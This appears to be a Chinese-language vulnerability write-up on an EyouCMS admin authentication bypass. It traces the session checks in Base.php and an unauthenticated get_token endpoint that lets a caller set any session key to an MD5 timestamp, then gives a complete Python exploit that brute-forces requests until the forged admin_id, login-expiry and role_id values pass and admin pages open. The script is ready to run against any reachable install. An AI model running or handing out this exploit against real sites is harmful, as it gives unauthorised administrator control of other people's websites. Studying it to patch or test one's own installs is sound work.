后台登錄判斷
- application/admin/controller/Base.php
- 跟進_initialize方法,定位到第57行
$admin_login_expire = session('admin_login_expire'); // 登錄有效期web_login_expiretime
if (session('?admin_id') && getTime() - intval($admin_login_expire) < $web_login_expiretime) {
session('admin_login_expire', getTime()); // 登錄有效期
$this->check_priv();//檢查管理員菜單操作權限
}else{
/*自動退出*/
adminLog('訪問后台');
// 進入后台
}
- 這里獲取session,有兩個要求
session('?admin_id')這里要求admin_id有值即可,YouDianCMS里面是一樣的。然后getTime() - intval($admin_login_expire)這里需要獲取當前時間戳-獲取admin_login_expire<3600.因此這里獲取的session是一個很大的數字。
- 再向下走跟進check_priv方法,當前文件第98行。
if (0 >= intval(session('admin_info.role_id'))) {
//超級管理員無需驗證
return true;
- 發現這里只需要獲取的session小於等於0即可。
- 總結需要滿足以下條件。
admin_id 有值getTime() - intval($admin_login_expire)<3600intval(admin_info.role_id)=<0
任意session設置
- application/api/controller/Ajax.php
public function get_token($name = '__token__')
{
if (IS_AJAX) {
echo $this->request->token($name);
exit;
} else {
abort(404);
}
}
- 發現這里沒做鑒權,我們能直接訪問,同時參數可控,繼續跟進token方法。
public function token($name = '__token__', $type = 'md5')
{
$type = is_callable($type) ? $type : 'md5';
$token = call_user_func($type, $_SERVER['REQUEST_TIME_FLOAT']);
if ($this->isAjax()) {
header($name . ': ' . $token);
}
Session::set($name, $token);
return $token;
}
- 發現這里的session設置的鍵名,我么能夠控制,值為MD5加密的時間戳。
- 上面獲取的session有兩個都轉換成了整數,因為MD5加密的原因,我們因此可能遇見的字符開頭為數字字符都有可能,因此需要一直請求,直到滿足我們的條件為止。
Script
- 因為時間戳MD5加密的原因,導致可能要等很久才能找到我們需要的session。
from time import time,sleep
import requests
import sys
class EyouCMS:
def __init__(self,URL):
self.Req = requests.session()
self.URL = URL
self.SleepTime = 0.5
self.AdminURL = 'login.php?m=admin&c=Admin&a=admin_edit&id=1&lang=cn'
self.Payload = 'index.php/?m=api&c=ajax&a=get_token&name='
self.admin_id = 'admin_id'
self.admin_login_expire = 'admin_login_expire'
self.admin_info_role_id = 'admin_info.role_id'
self.Headers = {
'x-requested-with': 'XMLHttpRequest',
}
def Banner(self):
print("-"*10 + "后台登錄繞過" + "-"*10)
def change(self,string):
temp = ''
for n, s in enumerate(string):
if n == 0:
if s.isalpha():
return '0'
break
if s.isdigit():
temp += str(s)
else:
if s.isalpha():
break
return temp
def SetID(self):
res = self.Req.get(self.URL + self.Payload + self.admin_id, headers=self.Headers)
print("admin_id[+]:\t\t\t\t\t" + res.text)
if 'Set-cookie' in res.headers:
print(res.headers['set-cookie'])
if res.status_code != 200:
sys.exit("Api模塊請求404")
# print(res.headers)
def SetExpire(self):
while True:
res = self.Req.get(self.URL + self.Payload + self.admin_login_expire, headers=self.Headers)
# print(res.text,end='\t\t\t\t')
# print(self.change(res.text))
if(time()-int(self.change(res.text),10)<3600):
print("admin_login_expire[+]:\t\t\t" + res.text)
# print(res.headers)
break
sleep(self.SleepTime)
def SetRoleID(self):
while True:
res = self.Req.get(self.URL + self.Payload + self.admin_info_role_id, headers=self.Headers)
if(int(self.change(res.text),10)<=0):
print("admin_info.rele_id[+]:\t\t\t" + res.text)
break
sleep(self.SleepTime)
def CheckLogin(self):
res = self.Req.get(self.URL + self.AdminURL, headers=self.Headers)
res.encoding = res.apparent_encoding
if '更換頭像' in res.text:
print("OK")
def run(self):
self.SetID()
self.SetExpire()
self.SetRoleID()
self.CheckLogin()
if __name__ == '__main__':
Start = time()
URL = 'http://127.0.0.1/eyoucms/'
e = EyouCMS(URL)
e.run()
End = time()
print(End-Start)
